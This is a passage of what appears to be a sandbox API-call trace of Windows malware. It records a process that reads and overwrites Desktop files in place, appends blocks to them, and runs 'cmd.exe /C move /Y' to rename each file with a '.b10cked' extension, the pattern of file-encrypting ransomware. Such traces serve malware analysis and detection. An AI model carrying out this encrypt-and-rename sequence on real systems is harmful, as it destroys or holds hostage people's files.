lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0219.746] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CKLvAyoW1loaz.flv", cchWideChar=17, lpMultiByteStr=0x1328744, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CKLvAyoW1loaz.flv", lpUsedDefaultChar=0x0) returned 17 [0219.746] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x1835d [0219.746] WriteFile (in: hFile=0x1b4, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0219.746] CloseHandle (hObject=0x1b4) returned 1 [0219.747] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\CKLvAyoW1loaz.flv", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\CKLVAY~1.FLV") returned 0x25 [0219.747] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\") returned 0x19 [0219.747] 
CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\CKLVAY~1.FLV\" \"C:\\Users\\EEBsYm5\\Desktop\\CKLvAyoW1loaz.flv.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\CKLVAY~1.FLV\" \"C:\\Users\\EEBsYm5\\Desktop\\CKLvAyoW1loaz.flv.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x120, hThread=0x1b4, dwProcessId=0x520, dwThreadId=0xf58)) returned 1 [0219.758] CloseHandle (hObject=0x120) returned 1 [0219.758] CloseHandle (hObject=0x1b4) returned 1 [0219.758] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0219.758] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Contacts\\", cchLength=0x1a | out: lpsz="C:\\USERS\\EEBSYM5\\CONTACTS\\") returned 0x1a [0219.758] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount1=25, lpString2="C:\\USERS\\EEBSYM5\\CONTACTS\\", cchCount2=26) returned 3 [0219.758] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0219.758] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0219.759] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount1=25, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 2 [0219.759] 
WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0219.759] ReleaseMutex (hMutex=0xf8) returned 1 [0219.759] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0219.759] ReleaseMutex (hMutex=0xf8) returned 1 [0219.759] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0219.759] ReleaseMutex (hMutex=0xf8) returned 1 [0219.759] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0219.759] ReleaseMutex (hMutex=0xf8) returned 1 [0219.759] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\dcFt2Dy7M6d8J9.ots" (normalized: "c:\\users\\eebsym5\\desktop\\dcft2dy7m6d8j9.ots"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b4 [0219.759] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.759] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x72fb [0219.759] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.759] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=27654834139) returned 1 [0219.759] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.759] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x72fb [0219.759] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.759] 
SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.759] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x72fb [0219.759] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.759] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0219.759] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x72fb [0219.760] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0219.760] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.760] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x72fb [0219.760] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.760] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.760] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x72fb [0219.760] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: 
lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.760] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.760] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x72fb [0219.760] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.760] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.760] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x72fb [0219.760] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.760] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.760] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x72fb [0219.760] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.760] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.760] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x72fb [0219.760] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, 
lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.760] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x6e13 [0219.760] ReadFile (in: hFile=0x1b4, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0219.761] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0219.761] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0219.761] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x72fb [0219.761] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0219.762] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0219.762] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0219.762] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x72fb [0219.762] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0219.762] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: 
lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0219.762] ReadFile (in: hFile=0x1b4, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x397c, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x397c, lpOverlapped=0x0) returned 1 [0219.762] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0219.762] WriteFile (in: hFile=0x1b4, lpBuffer=0x123fd48*, nNumberOfBytesToWrite=0x397c, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesWritten=0x12ec1c*=0x397c, lpOverlapped=0x0) returned 1 [0219.762] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-14716, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x397f [0219.762] ReadFile (in: hFile=0x1b4, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x397c, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x397c, lpOverlapped=0x0) returned 1 [0219.762] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-14716, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x397f [0219.762] WriteFile (in: hFile=0x1b4, lpBuffer=0x123fd48*, nNumberOfBytesToWrite=0x397c, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesWritten=0x12ec1c*=0x397c, lpOverlapped=0x0) returned 1 [0219.843] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="dcFt2Dy7M6d8J9.ots", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0219.843] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="dcFt2Dy7M6d8J9.ots", cchWideChar=18, lpMultiByteStr=0x1328744, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 
lpMultiByteStr="dcFt2Dy7M6d8J9.ots", lpUsedDefaultChar=0x0) returned 18 [0219.843] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x72fb [0219.843] WriteFile (in: hFile=0x1b4, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0219.843] CloseHandle (hObject=0x1b4) returned 1 [0219.844] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\dcFt2Dy7M6d8J9.ots", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\DCFT2D~1.OTS") returned 0x25 [0219.845] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\") returned 0x19 [0219.845] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\DCFT2D~1.OTS\" \"C:\\Users\\EEBsYm5\\Desktop\\dcFt2Dy7M6d8J9.ots.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\DCFT2D~1.OTS\" \"C:\\Users\\EEBsYm5\\Desktop\\dcFt2Dy7M6d8J9.ots.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x120, hThread=0x1b4, dwProcessId=0xf44, dwThreadId=0xc98)) returned 1 [0219.862] CloseHandle (hObject=0x120) returned 1 [0219.862] CloseHandle (hObject=0x1b4) returned 1 
[0219.862] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0219.862] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Contacts\\", cchLength=0x1a | out: lpsz="C:\\USERS\\EEBSYM5\\CONTACTS\\") returned 0x1a [0219.862] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount1=25, lpString2="C:\\USERS\\EEBSYM5\\CONTACTS\\", cchCount2=26) returned 3 [0219.862] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0219.862] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0219.862] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount1=25, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 2 [0219.862] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0219.862] ReleaseMutex (hMutex=0xf8) returned 1 [0219.862] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0219.862] ReleaseMutex (hMutex=0xf8) returned 1 [0219.862] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0219.862] ReleaseMutex (hMutex=0xf8) returned 1 [0219.862] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0219.862] ReleaseMutex (hMutex=0xf8) returned 1 [0219.862] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\DDlQzm1zrUmfqtdJ.png" (normalized: "c:\\users\\eebsym5\\desktop\\ddlqzm1zrumfqtdj.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b4 [0219.863] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.863] SetFilePointer (in: 
hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xfc9c [0219.863] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.863] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=27665203068) returned 1 [0219.863] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.863] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xfc9c [0219.863] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.863] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.863] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xfc9c [0219.863] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.863] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0219.863] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0xfc9c [0219.863] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0219.863] SetFilePointer (in: 
hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.863] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xfc9c [0219.863] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.863] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.863] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xfc9c [0219.863] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.863] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.864] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xfc9c [0219.864] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.864] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.864] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xfc9c [0219.864] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 
[0219.864] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.864] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xfc9c [0219.864] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.864] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.864] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xfc9c [0219.864] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0219.864] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0xf7b4 [0219.864] ReadFile (in: hFile=0x1b4, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0219.865] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0219.865] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0219.865] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0xfc9c [0219.865] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, 
